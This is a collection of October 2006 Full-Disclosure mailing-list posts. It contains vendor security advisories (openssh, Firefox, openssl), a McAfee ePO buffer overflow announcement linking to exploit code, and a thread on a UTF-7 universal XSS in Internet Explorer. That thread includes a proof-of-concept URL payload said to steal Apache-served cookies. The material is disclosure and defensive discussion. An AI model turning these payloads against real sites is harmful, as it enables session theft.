[Full-disclosure] IE UXSS (Universal XSS in IE, was Re: Microsoft Internet Information Services UTF-7 XSS Vulnerability [MS06-053])
Eiji James Yoshida wrote in
http://lists.grok.org.uk/pipermail/full-disclosure/2006-October/049784.html
:
If 'Encoding' is set to 'Auto Select', and Internet Explorer finds a UTF-7
string in the response's body, it will set the charset encoding to UTF-7
automatically ...
Proof of concept:
http://MaliciousSite/+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4-...
I know that Apache servers return
The requested URL /xyz was not found on this server.
when fetching http://apache.svr/xyz . Trouble is that IE shows a custom
error message, ignoring the error body. Pondering, see that
http://en.wikipedia.org/wiki/HTTP_404
says:
... Internet Explorer will not display these pages, however, unless they
are larger than 512 bytes. ...
This provides UXSS (Universal Cross-Site Scripting):
http://apache.svr/+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4-/ZZZ...
(with a couple of hundred Zs) will do what we want. Works for https also:
https://apache.svr/+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4-/ZZZ...
Can steal any Apache server (http or https) cookies. I do not have easy
access to ISS servers to test whether similar attacks would work there.
Will Apache fix (carefully escape) the error message? Will MS fix IE to
not be so over-friendly?
In the meantime, do not use IE to do anything private like banking...
Cheers,
Paul Szabo [EMAIL PROTECTED] http://www.maths.usyd.edu.au/u/psz/
School of Mathematics and Statistics University of SydneyAustralia
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] McAfee EPO Buffer Overflow
###
# #
# McAfee Epolicy 3.5.0 / Protection Pilot 1.1.0 Buffer Overflow #
#
#
# www.remote-exploit.org
#
#
#
# muts {at} remote-exploit org#
###
[-] Product Information
McAfeeR ePolicy OrchestratorR is a security management solution that gives
you a coordinated defense against malicious threats and attacks. As your
central hub, you can keep protection up to date; configure and enforce
protection policies; and monitor security status from one centralized
console.
[-] Vulnerability Description
McAfeeR ePolicy OrchestratorR contains a pre-authentication buffer overflow
vulnerability in NAISERV.exe. Protection Pilot 1.1.0 uses the same HTTP
server, and is also vulnerable.
[-] Exploit
Proof of concept exploit code is available at
http://www.remote-exploit.org/exploits/mcafee_epolicy_source.pm
[-] Exploitation Details
http://www.remote-exploit.org/advisories/mcafee-epo.pdf
[-] Vendor Status
Vendor was notified July 14th, 2006. ehm.
[-] Credits
The vulnerability was discovered by Mati Aharoni (muts) and xbxice.
[-] Shameless Promotion
Get ready for BackTrack v.2.0!
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [USN-355-1] openssh vulnerabilities
=== Ubuntu Security Notice USN-355-1 October 02, 2006 openssh vulnerabilities CVE-2006-4924, CVE-2006-5051 === A security issue affects the following Ubuntu releases: Ubuntu 5.04 Ubuntu 5.10 Ubuntu 6.06 LTS This advisory also applies to the corresponding versions of Kubuntu, Edubuntu, and Xubuntu. The problem can be corrected by upgrading your system to the following package versions: Ubuntu 5.04: openssh-server 1:3.9p1-1ubuntu2.3 Ubuntu 5.10: openssh-server 1:4.1p1-7ubuntu4.2 Ubuntu 6.06 LTS: openssh-server 1:4.2p1-7ubuntu3.1 In general, a standard system upgrade is sufficient to effect the necessary changes. Details follow: Tavis Ormandy discovered that the SSH daemon did not properly handle authentication packets with duplicated blocks. By sending specially crafted packets, a remote attacker could exploit this to cause the ssh daemon to drain all available CPU resources until the login grace time expired. (CVE-2006-4924) Mark Dowd discovered a race condition in the server's signal handling. A remote attacker could exploit this to crash the server. (CVE-2006-5051) Updated packages for Ubuntu 5.04: Source archives: http://security.ubuntu.com/ubuntu/pool/main/o/openssh/openssh_3.9p1-1ubuntu2.3.diff.gz Size/MD5: 143243 ee5b491cf023e53b4991fe319da669aa http://security.ubuntu.com/ubuntu/pool/main/o/openssh/openssh_3.9p1-1ubuntu2.3.dsc Size/MD5: 866 237dcc91dde3201ba0bc5b9372654708 http://security.ubuntu.com/ubuntu/pool/main/o/openssh/openssh_3.9p1.orig.tar.gz Size/MD5: 832804 530b1dcbfe7a4a4ce4959c0775b85a5a Architecture independent packages: http://security.ubuntu.com/ubuntu/pool/main/o/openssh/ssh_3.9p1-1ubuntu2.3_all.deb Size/MD5:31312 a25012353606283dbae09b56dc60f1bb amd64 architecture (Athlon64, Opteron, EM64T Xeon) http://security.ubuntu.com/ubuntu/pool/main/o/openssh/openssh-client-udeb_3.9p1-1ubuntu2.3_amd64.udeb Size/MD5: 166846 b0507203d786efa365cef305acc0b790 http://security.ubuntu.com/ubuntu/pool/main/o/openssh/openssh-client_3.9p1-1ubuntu2.3_amd64.deb Size/MD5: 544562 4464ce148432194666a3fd7fae5b884f http://security.ubuntu.com/ubuntu/pool/universe/o/openssh/openssh-server-udeb_3.9p1-1ubuntu2.3_amd64.udeb Size/MD5: 179290 2774b437173889390312fab14a0d9edf http://security.ubuntu.com/ubuntu/pool/main/o/openssh/openssh-server_3.9p1-1ubuntu2.3_amd64.deb Size/MD5: 279624 deb54b320447ab79b8d8fb351c04960d http://security.ubuntu.com/ubuntu/pool/main/o/openssh/ssh-askpass-gnome_3.9p1-1ubuntu2.3_amd64.deb Size/MD5:62924 083fd0c899ed8c0c088f6f659d2fd017 i386 architecture (x86 compatible Intel/AMD) http://security.ubuntu.com/ubuntu/pool/main/o/openssh/openssh-client-udeb_3.9p1-1ubuntu2.3_i386.udeb Size/MD5: 139452 31deaca18b94b27d52c1870d86810db4 http://security.ubuntu.com/ubuntu/pool/main/o/openssh/openssh-client_3.9p1-1ubuntu2.3_i386.deb Size/MD5: 492810 8df816ca89945adc93e80d49f53aebe6 http://security.ubuntu.com/ubuntu/pool/universe/o/openssh/openssh-server-udeb_3.9p1-1ubuntu2.3_i386.udeb Size/MD5: 149160 632d59e71b6a3f5aab50e4cfd3842442 http://security.ubuntu.com/ubuntu/pool/main/o/openssh/openssh-server_3.9p1-1ubuntu2.3_i386.deb Size/MD5: 256218 5f9791afb335d57cd1a830c1e886ee08 http://security.ubuntu.com/ubuntu/pool/main/o/openssh/ssh-askpass-gnome_3.9p1-1ubuntu2.3_i386.deb Size/MD5:62512 9f21ce3a1134980ec47c1e99cf62ff61 powerpc architecture (Apple Macintosh G3/G4/G5) http://security.ubuntu.com/ubuntu/pool/main/o/openssh/openssh-client-udeb_3.9p1-1ubuntu2.3_powerpc.udeb Size/MD5: 159886 447da8535b3b4c0b85fefd44e01f4c4d http://security.ubuntu.com/ubuntu/pool/main/o/openssh/openssh-client_3.9p1-1ubuntu2.3_powerpc.deb Size/MD5: 541254 8d16c7e18fef84ab8f6a435c8c988b93 http://security.ubuntu.com/ubuntu/pool/universe/o/openssh/openssh-server-udeb_3.9p1-1ubuntu2.3_powerpc.udeb Size/MD5: 163428 e0ca6e79f907c35e2c32e515b8e808dd http://security.ubuntu.com/ubuntu/pool/main/o/openssh/openssh-server_3.9p1-1ubuntu2.3_powerpc.deb Size/MD5: 273640 c8e00fcbe413ac902ccc4dca508572f2 http://security.ubuntu.com/ubuntu/pool/main/o/openssh/ssh-askpass-gnome_3.9p1-1ubuntu2.3_powerpc.deb Size/MD5:64092 a88a46209fac664959c35b36fb93066e Updated packages for Ubuntu 5.10: Source archives: http://security.ubuntu.com/ubuntu/pool/main/o/openssh/openssh_4.1p1-7ubuntu4.2.diff.gz Size/MD5: 158624 fc0f2620cc3fc07ad4ea050b675e5f1b http://security.ubuntu.com/ubuntu/pool/main/o/openssh/openssh_4.1p1-7ubuntu4.2.dsc Size/MD5: 971 cd61da4d0742c684aaf90b8390252818
Re: [Full-disclosure] IE UXSS (Universal XSS in IE, was Re: Microsoft Internet Information Services UTF-7 XSS Vulnerability [MS06-053])
On 10/2/06, Paul Szabo [EMAIL PROTECTED] wrote:
This provides UXSS (Universal Cross-Site Scripting):
http://apache.svr/+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4-/ZZZ...
(with a couple of hundred Zs) will do what we want. Works for https also:
https://apache.svr/+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4-/ZZZ...
Can steal any Apache server (http or https) cookies. I do not have easy
access to ISS servers to test whether similar attacks would work there.
Will Apache fix (carefully escape) the error message? Will MS fix IE to
not be so over-friendly?
This should only be possible if neither the HTTP headers nor the HTML
page specifies the character set of the document. If the server
doesn't tell IE the character set, the autodetection feature will
kick in, and the site is vulnerable. I just tested Apache 1.3.37 and
Apache 2.2.3, and both specified a content-type header of text/html;
charset=iso-8859-1 for 404 responses, so the attack failed. My
browser was IE 6.0.2800.1106.
I'm guessing that you tested a server wth some kind of customized 404
response that neglected to include a charset specification. That's
not a vulnerability in Apache, that is poor site configuration.
(I do wish that IE didn't have this character set autodetection
feature, or at least that it was restricted to commonly used character
sets that don't use strange encodings for HTML metacharacters.)
Regards,
Brian
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [USN-354-1] Firefox vulnerabilities
=== Ubuntu Security Notice USN-354-1 October 02, 2006 firefox vulnerabilities CVE-2006-3113, CVE-2006-3677, CVE-2006-3801, CVE-2006-3802, CVE-2006-3803, CVE-2006-3805, CVE-2006-3806, CVE-2006-3807, CVE-2006-3808, CVE-2006-3809, CVE-2006-3810, CVE-2006-3811, CVE-2006-3812, CVE-2006-4253, CVE-2006-4340, CVE-2006-4565, CVE-2006-4566, CVE-2006-4567, CVE-2006-4568, CVE-2006-4569, CVE-2006-4571 === A security issue affects the following Ubuntu releases: Ubuntu 5.10 This advisory also applies to the corresponding versions of Kubuntu, Edubuntu, and Xubuntu. The problem can be corrected by upgrading your system to the following package versions: Ubuntu 5.10: firefox 1.5.dfsg+1.5.0.7-0ubuntu5.10.3 firefox-dom-inspector1.5.dfsg+1.5.0.7-0ubuntu5.10.3 firefox-gnome-support1.5.dfsg+1.5.0.7-0ubuntu5.10.3 devhelp 0.10-1ubuntu2.1 devhelp-common 0.10-1ubuntu2.1 epiphany-browser 1.8.2-0ubuntu1.1 epiphany-browser-dev 1.8.2-0ubuntu1.1 gnome-app-install0+20051005.1 libdevhelp-1-0 0.10-1ubuntu2.1 libdevhelp-1-dev 0.10-1ubuntu2.1 mozilla-firefox-locale-af-za 1.5-ubuntu5.10-1 mozilla-firefox-locale-ast-es1.5-ubuntu5.10-1 mozilla-firefox-locale-bg-bg 1.5-ubuntu5.10-1 mozilla-firefox-locale-cs-cz 1.5-ubuntu5.10-1 mozilla-firefox-locale-da-dk 1.5-ubuntu5.10-1 mozilla-firefox-locale-de1.5-ubuntu5.10-1 mozilla-firefox-locale-de-de 1.5-ubuntu5.10-1 mozilla-firefox-locale-en-gb 1.5-ubuntu5.10-1 mozilla-firefox-locale-es1.5-ubuntu5.10-1 mozilla-firefox-locale-es-ar 1.5-ubuntu5.10-1 mozilla-firefox-locale-es-es 1.5-ubuntu5.10-1 mozilla-firefox-locale-fi-fi 1.5-ubuntu5.10-1 mozilla-firefox-locale-fr1.5-ubuntu5.10-1 mozilla-firefox-locale-fr-fr 1.5-ubuntu5.10-1 mozilla-firefox-locale-ga-ie 1.5-ubuntu5.10-1 mozilla-firefox-locale-gu-in 1.5-ubuntu5.10-1 mozilla-firefox-locale-he-il 1.5-ubuntu5.10-1 mozilla-firefox-locale-hu-hu 1.5-ubuntu5.10-1 mozilla-firefox-locale-mk-mk 1.5-ubuntu5.10-1 mozilla-firefox-locale-nl-nl 1.5-ubuntu5.10-1 mozilla-firefox-locale-pa-in 1.5-ubuntu5.10-1 mozilla-firefox-locale-pl1.5-ubuntu5.10-1 mozilla-firefox-locale-pl-pl 1.5-ubuntu5.10-1 mozilla-firefox-locale-pt-br 1.5-ubuntu5.10-1 mozilla-firefox-locale-pt-pt 1.5-ubuntu5.10-1 mozilla-firefox-locale-ro-ro 1.5-ubuntu5.10-1 mozilla-firefox-locale-ru-ru 1.5-ubuntu5.10-1 mozilla-firefox-locale-sl-si 1.5-ubuntu5.10-1 mozilla-firefox-locale-sq-al 1.5-ubuntu5.10-1 mozilla-firefox-locale-sv1.5-ubuntu5.10-1 mozilla-firefox-locale-sv-se 1.5-ubuntu5.10-1 mozilla-firefox-locale-tr-tr 1.5-ubuntu5.10-1 mozilla-firefox-locale-xh-za 1.5-ubuntu5.10-1 mozilla-firefox-locale-zh-cn 1.5-ubuntu5.10-1 mozilla-firefox-locale-zh-tw 1.5-ubuntu5.10-1 yelp 2.12.1-0ubuntu1.1 After a standard system upgrade you need to restart Firefox to effect the necessary changes. Since the 1.0.x series of Firefox is not supported any more, this update introduces the firefox 1.5 series into Ubuntu 5.10. Please check whether all your extensions still work as expected. Details follow: Various flaws have been reported that allow an attacker to execute arbitrary code with user privileges by tricking the user into opening a malicious URL. (CVE-2006-3113, CVE-2006-3677, CVE-2006-3801, CVE-2006-3803, CVE-2006-3805, CVE-2006-3806, CVE-2006-3807, CVE-2006-3809, CVE-2006-3811, CVE-2006-3812, CVE-2006-4253, CVE-2006-4565, CVE-2006-4566, CVE-2006-4568, CVE-2006-4569 CVE-2006-4571) Cross-site scripting vulnerabilities were found in the XPCNativeWrapper() function and native DOM method handlers. A malicious web site could exploit these to modify the contents or steal confidential data (such as passwords) from other opened web pages. (CVE-2006-3802, CVE-2006-3810) A bug was found in the script handler for automatic proxy configuration. A malicious proxy could send scripts which could execute arbitrary code with the user's privileges. (CVE-2006-3808) The NSS library did not sufficiently check the padding of PKCS #1 v1.5 signatures if the exponent of the public key is 3 (which is widely used for CAs). This could be exploited to forge valid signatures without the need of the secret key.
Re: [Full-disclosure] McAfee EPO Buffer Overflow
Hi, muts wrote: [-] Vendor Status Vendor was notified July 14th, 2006. ehm. and more: Advisory published: http://knowledge.mcafee.com/SupportSite/search.do?cmd=displayKCdocType=kcexternalId=8611438sliceId=SAL_PublicdialogID=2997768stateId=0%200%202995803 patch already provided. GTi ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Security Rss Feeds
crazy frog crazy frog wrote: thanks all for sharing, i found around 240+ list of various security related RSS Feeds. Get it here:- http://www.secgeeks.infys.net/security_rss_feeds _CF That's an interesting list, especially since it's mine http://www.bloglines.com/public/TaoSecurity starting with the 23rd entry for Bloglines and continuing another 200+ entries. I knew people were republishing my blog with their name on my content. I didn't know they were doing the same with my Bloglines choices. Richard http://taosecurity.blogspot.com ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] McAfee EPO Buffer Overflow
Title: Re: McAfee EPO Buffer Overflow [-] Vendor Status A patch has been posted to the McAfee.com download site. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Security Rss Feeds
yes i forgot to mention your name . On 10/2/06, Richard Bejtlich [EMAIL PROTECTED] wrote: crazy frog crazy frog wrote: thanks all for sharing, i found around 240+ list of various security related RSS Feeds. Get it here:- http://www.secgeeks.infys.net/security_rss_feeds _CF That's an interesting list, especially since it's mine http://www.bloglines.com/public/TaoSecurity starting with the 23rd entry for Bloglines and continuing another 200+ entries. I knew people were republishing my blog with their name on my content. I didn't know they were doing the same with my Bloglines choices. Richard http://taosecurity.blogspot.com ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- --- http://www.secgeeks.com --- ting ding ting ding ting ding ting ding ting ding ding i m crazy frog :) oh yeah oh yeah... another wannabe, in hackerland!!! ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] October Chicago 2600/DC312 Meeting Information
BEGIN:VCALENDAR PRODID:-//Google Inc//Google Calendar 70.9054//EN VERSION:2.0 CALSCALE:GREGORIAN METHOD:REQUEST BEGIN:VEVENT DTSTART:20061007T00Z DTEND:20061007T08Z DTSTAMP:20061002T162110Z ORGANIZER;CN=Steven McGrath:MAILTO:[EMAIL PROTECTED] UID:[EMAIL PROTECTED] ATTENDEE;CUTYPE=INDIVIDUAL;ROLE=REQ-PARTICIPANT;PARTSTAT=NEEDS-ACTION;RSVP= TRUE;[EMAIL PROTECTED];X-NUM-GUESTS=0:MAILTO:chicago26 [EMAIL PROTECTED] ATTENDEE;CUTYPE=INDIVIDUAL;ROLE=REQ-PARTICIPANT;PARTSTAT=NEEDS-ACTION;RSVP= TRUE;[EMAIL PROTECTED];X-NUM-GUESTS=0:MAILTO:[EMAIL PROTECTED] ATTENDEE;CUTYPE=INDIVIDUAL;ROLE=REQ-PARTICIPANT;PARTSTAT=NEEDS-ACTION;RSVP= TRUE;[EMAIL PROTECTED];X-NUM-GUESTS=0:MAILTO:[EMAIL PROTECTED] ATTENDEE;CUTYPE=INDIVIDUAL;ROLE=REQ-PARTICIPANT;PARTSTAT=NEEDS-ACTION;RSVP= TRUE;[EMAIL PROTECTED];X-NUM-GUESTS=0:MAILTO:snort-users @lists.sourceforge.net ATTENDEE;CUTYPE=INDIVIDUAL;ROLE=REQ-PARTICIPANT;PARTSTAT=NEEDS-ACTION;RSVP= TRUE;[EMAIL PROTECTED];X-NUM-GUESTS=0:MAILTO:full-disclo [EMAIL PROTECTED] ATTENDEE;CUTYPE=INDIVIDUAL;ROLE=REQ-PARTICIPANT;PARTSTAT=NEEDS-ACTION;RSVP= TRUE;[EMAIL PROTECTED];X-NUM-GUESTS=0:MAILTO:isn@infosecnews.org ATTENDEE;CUTYPE=INDIVIDUAL;ROLE=REQ-PARTICIPANT;PARTSTAT=NEEDS-ACTION;RSVP= TRUE;[EMAIL PROTECTED];X-NUM-GUESTS=0:MAILTO:[EMAIL PROTECTED] ATTENDEE;CUTYPE=INDIVIDUAL;ROLE=REQ-PARTICIPANT;PARTSTAT=NEEDS-ACTION;RSVP= TRUE;[EMAIL PROTECTED];X-NUM-GUESTS=0:MAILTO:[EMAIL PROTECTED] ATTENDEE;CUTYPE=INDIVIDUAL;ROLE=REQ-PARTICIPANT;PARTSTAT=NEEDS-ACTION;RSVP= TRUE;[EMAIL PROTECTED];X-NUM-GUESTS=0:MAILTO:[EMAIL PROTECTED] .org ATTENDEE;CUTYPE=INDIVIDUAL;ROLE=REQ-PARTICIPANT;PARTSTAT=NEEDS-ACTION;RSVP= TRUE;CN=Jason Capezio;X-NUM-GUESTS=0:MAILTO:[EMAIL PROTECTED] ATTENDEE;CUTYPE=INDIVIDUAL;ROLE=REQ-PARTICIPANT;PARTSTAT=NEEDS-ACTION;RSVP= TRUE;[EMAIL PROTECTED];X-NUM-GUESTS=0:MAILTO:[EMAIL PROTECTED] ATTENDEE;CUTYPE=INDIVIDUAL;ROLE=REQ-PARTICIPANT;PARTSTAT=NEEDS-ACTION;RSVP= TRUE;[EMAIL PROTECTED];X-NUM-GUESTS=0:MAILTO:[EMAIL PROTECTED] ATTENDEE;CUTYPE=INDIVIDUAL;ROLE=REQ-PARTICIPANT;PARTSTAT=NEEDS-ACTION;RSVP= TRUE;CN=Mike Copeland;X-NUM-GUESTS=0:MAILTO:[EMAIL PROTECTED] ATTENDEE;CUTYPE=INDIVIDUAL;ROLE=REQ-PARTICIPANT;PARTSTAT=NEEDS-ACTION;RSVP= TRUE;[EMAIL PROTECTED];X-NUM-GUESTS=0:MAILTO:[EMAIL PROTECTED] .com ATTENDEE;CUTYPE=INDIVIDUAL;ROLE=REQ-PARTICIPANT;PARTSTAT=NEEDS-ACTION;RSVP= TRUE;CN=Diane Zaroski;X-NUM-GUESTS=0:MAILTO:[EMAIL PROTECTED] ATTENDEE;CUTYPE=INDIVIDUAL;ROLE=REQ-PARTICIPANT;PARTSTAT=NEEDS-ACTION;RSVP= TRUE;[EMAIL PROTECTED];X-NUM-GUESTS=0:MAILTO:[EMAIL PROTECTED] ATTENDEE;CUTYPE=INDIVIDUAL;ROLE=REQ-PARTICIPANT;PARTSTAT=NEEDS-ACTION;RSVP= TRUE;[EMAIL PROTECTED];X-NUM-GUESTS=0:MAILTO:[EMAIL PROTECTED] .com ATTENDEE;CUTYPE=INDIVIDUAL;ROLE=REQ-PARTICIPANT;PARTSTAT=NEEDS-ACTION;RSVP= TRUE;CN=Anthony Guastaferri;X-NUM-GUESTS=0:MAILTO:[EMAIL PROTECTED] ATTENDEE;CUTYPE=INDIVIDUAL;ROLE=REQ-PARTICIPANT;PARTSTAT=NEEDS-ACTION;RSVP= TRUE;[EMAIL PROTECTED];X-NUM-GUESTS=0:MAILTO:[EMAIL PROTECTED] ATTENDEE;CUTYPE=INDIVIDUAL;ROLE=REQ-PARTICIPANT;PARTSTAT=NEEDS-ACTION;RSVP= TRUE;[EMAIL PROTECTED];X-NUM-GUESTS=0:MAILTO:[EMAIL PROTECTED] ATTENDEE;CUTYPE=INDIVIDUAL;ROLE=REQ-PARTICIPANT;PARTSTAT=NEEDS-ACTION;RSVP= TRUE;CN=w o;X-NUM-GUESTS=0:MAILTO:[EMAIL PROTECTED] ATTENDEE;CUTYPE=INDIVIDUAL;ROLE=REQ-PARTICIPANT;PARTSTAT=NEEDS-ACTION;RSVP= TRUE;[EMAIL PROTECTED];X-NUM-GUESTS=0:MAILTO:[EMAIL PROTECTED] atex.com ATTENDEE;CUTYPE=INDIVIDUAL;ROLE=REQ-PARTICIPANT;PARTSTAT=NEEDS-ACTION;RSVP= TRUE;[EMAIL PROTECTED];X-NUM-GUESTS=0:MAILTO:[EMAIL PROTECTED] taff.com ATTENDEE;CUTYPE=INDIVIDUAL;ROLE=REQ-PARTICIPANT;PARTSTAT=NEEDS-ACTION;RSVP= TRUE;[EMAIL PROTECTED];X-NUM-GUESTS=0:MAILTO:[EMAIL PROTECTED] ATTENDEE;CUTYPE=INDIVIDUAL;ROLE=REQ-PARTICIPANT;PARTSTAT=NEEDS-ACTION;RSVP= TRUE;[EMAIL PROTECTED];X-NUM-GUESTS=0:MAILTO:[EMAIL PROTECTED] ATTENDEE;CUTYPE=INDIVIDUAL;ROLE=REQ-PARTICIPANT;PARTSTAT=NEEDS-ACTION;RSVP= TRUE;CN=Dan Dorenbos;X-NUM-GUESTS=0:MAILTO:[EMAIL PROTECTED] ATTENDEE;CUTYPE=INDIVIDUAL;ROLE=REQ-PARTICIPANT;PARTSTAT=NEEDS-ACTION;RSVP= TRUE;CN=data w0lf;X-NUM-GUESTS=0:MAILTO:[EMAIL PROTECTED] ATTENDEE;CUTYPE=INDIVIDUAL;ROLE=REQ-PARTICIPANT;PARTSTAT=NEEDS-ACTION;RSVP= TRUE;CN=Dustin General;X-NUM-GUESTS=0:MAILTO:[EMAIL PROTECTED] ATTENDEE;CUTYPE=INDIVIDUAL;ROLE=REQ-PARTICIPANT;PARTSTAT=NEEDS-ACTION;RSVP= TRUE;[EMAIL PROTECTED];X-NUM-GUESTS=0:MAILTO:[EMAIL PROTECTED] ATTENDEE;CUTYPE=INDIVIDUAL;ROLE=REQ-PARTICIPANT;PARTSTAT=NEEDS-ACTION;RSVP= TRUE;[EMAIL PROTECTED];X-NUM-GUESTS=0:MAILTO:[EMAIL PROTECTED] ATTENDEE;CUTYPE=INDIVIDUAL;ROLE=REQ-PARTICIPANT;PARTSTAT=NEEDS-ACTION;RSVP= TRUE;[EMAIL PROTECTED];X-NUM-GUESTS=0:MAILTO:[EMAIL PROTECTED] ATTENDEE;CUTYPE=INDIVIDUAL;ROLE=REQ-PARTICIPANT;PARTSTAT=NEEDS-ACTION;RSVP= TRUE;[EMAIL PROTECTED];X-NUM-GUESTS=0:MAILTO:[EMAIL PROTECTED] ATTENDEE;CUTYPE=INDIVIDUAL;ROLE=REQ-PARTICIPANT;PARTSTAT=NEEDS-ACTION;RSVP= TRUE;CN=Shawn Featherly;X-NUM-GUESTS=0:MAILTO:[EMAIL PROTECTED]
Re: [Full-disclosure] McAfee EPO Buffer Overflow
An xtreamly neat work muts !! :)
-d
-Original Message-
From: [EMAIL PROTECTED]
[mailto:[EMAIL PROTECTED] On Behalf Of muts
Sent: Sunday, October 01, 2006 6:56 PM
To: full-disclosure@lists.grok.org.uk
Subject: [Full-disclosure] McAfee EPO Buffer Overflow
###
# #
# McAfee Epolicy 3.5.0 / Protection Pilot 1.1.0 Buffer Overflow #
#
#
# www.remote-exploit.org
#
#
#
# muts {at} remote-exploit org#
###
[-] Product Information
McAfeeR ePolicy OrchestratorR is a security management solution that gives
you a coordinated defense against malicious threats and attacks. As your
central hub, you can keep protection up to date; configure and enforce
protection policies; and monitor security status from one centralized
console.
[-] Vulnerability Description
McAfeeR ePolicy OrchestratorR contains a pre-authentication buffer overflow
vulnerability in NAISERV.exe. Protection Pilot 1.1.0 uses the same HTTP
server, and is also vulnerable.
[-] Exploit
Proof of concept exploit code is available at
http://www.remote-exploit.org/exploits/mcafee_epolicy_source.pm
[-] Exploitation Details
http://www.remote-exploit.org/advisories/mcafee-epo.pdf
[-] Vendor Status
Vendor was notified July 14th, 2006. ehm.
[-] Credits
The vulnerability was discovered by Mati Aharoni (muts) and xbxice.
[-] Shameless Promotion
Get ready for BackTrack v.2.0!
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] IE UXSS (Universal XSS in IE, was Re: Microsoft Internet Information Services UTF-7 XSS Vulnerability [MS06-053])
--On October 2, 2006 9:44:27 AM -0400 Brian Eaton [EMAIL PROTECTED] wrote: I'm guessing that you tested a server wth some kind of customized 404 response that neglected to include a charset specification. That's not a vulnerability in Apache, that is poor site configuration. Brian, a question for clarification. When you say customized 404 response, you are not referring to a customized error document (as described briefly in the httpd.conf file) but rather to having changed the headers that the server returns when queried with a GET request, correct? And wouldn't this require changing source code and compiling a custom build of apache? Paul Schmehl ([EMAIL PROTECTED]) Adjunct Information Security Officer The University of Texas at Dallas http://www.utdallas.edu/ir/security/ p7s3qIgNkCjVr.p7s Description: S/MIME cryptographic signature ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] IE UXSS (Universal XSS in IE, was Re: Microsoft Internet Information Services UTF-7 XSS Vulnerability [MS06-053])
On 10/2/06, Paul Schmehl [EMAIL PROTECTED] wrote: --On October 2, 2006 9:44:27 AM -0400 Brian Eaton [EMAIL PROTECTED] wrote: I'm guessing that you tested a server wth some kind of customized 404 response that neglected to include a charset specification. That's not a vulnerability in Apache, that is poor site configuration. Brian, a question for clarification. When you say customized 404 response, you are not referring to a customized error document (as described briefly in the httpd.conf file) but rather to having changed the headers that the server returns when queried with a GET request, correct? And wouldn't this require changing source code and compiling a custom build of apache? I am referring to the customized error documents described in the httpd.conf file. No recompiling required. The default Apache response for 404s includes a content-type header specifying the iso-8859-1 charset. If you set up an ErrorDocument handler, though, Apache assumes you know what you are doing and does not include a charset specification in the content-type header. You need to do it yourself. Including a meta http-equiv tag in the HTML seems like an obvious fix, but there are other ways as well. Regards, Brian ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [ MDKSA-2006:172-1 ] - Updated openssl packages fix vulnerabilities
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 ___ Mandriva Linux Security Advisory MDKSA-2006:172-1 http://www.mandriva.com/security/ ___ Package : openssl Date: October 2, 2006 Affected: 2006.0, 2007.0, Corporate 3.0, Corporate 4.0, Multi Network Firewall 2.0 ___ Problem Description: Dr S N Henson of the OpenSSL core team and Open Network Security recently developed an ASN1 test suite for NISCC (www.niscc.gov.uk). When the test suite was run against OpenSSL two denial of service vulnerabilities were discovered. During the parsing of certain invalid ASN1 structures an error condition is mishandled. This can result in an infinite loop which consumes system memory. (CVE-2006-2937) Certain types of public key can take disproportionate amounts of time to process. This could be used by an attacker in a denial of service attack. (CVE-2006-2940) Tavis Ormandy and Will Drewry of the Google Security Team discovered a buffer overflow in the SSL_get_shared_ciphers utility function, used by some applications such as exim and mysql. An attacker could send a list of ciphers that would overrun a buffer. (CVE-2006-3738) Tavis Ormandy and Will Drewry of the Google Security Team discovered a possible DoS in the sslv2 client code. Where a client application uses OpenSSL to make a SSLv2 connection to a malicious server that server could cause the client to crash. (CVE-2006-4343) Updated packages are patched to address these issues. Update: There was an error in the original published patches for CVE-2006-2940. New packages have corrected this issue. ___ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-2937 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-2940 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3738 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-4343 ___ Updated Packages: Mandriva Linux 2006.0: 5e48a8d9a6a03a045b6d0d2b6903dc5b 2006.0/i586/libopenssl0.9.7-0.9.7g-2.5.20060mdk.i586.rpm f86f3a2efd19ff5fb1600212cbd8e463 2006.0/i586/libopenssl0.9.7-devel-0.9.7g-2.5.20060mdk.i586.rpm 73b99c1a8a34fe3c2279c09c4f385804 2006.0/i586/libopenssl0.9.7-static-devel-0.9.7g-2.5.20060mdk.i586.rpm 526fcd69e1a1768c82afd573dc16982f 2006.0/i586/openssl-0.9.7g-2.5.20060mdk.i586.rpm 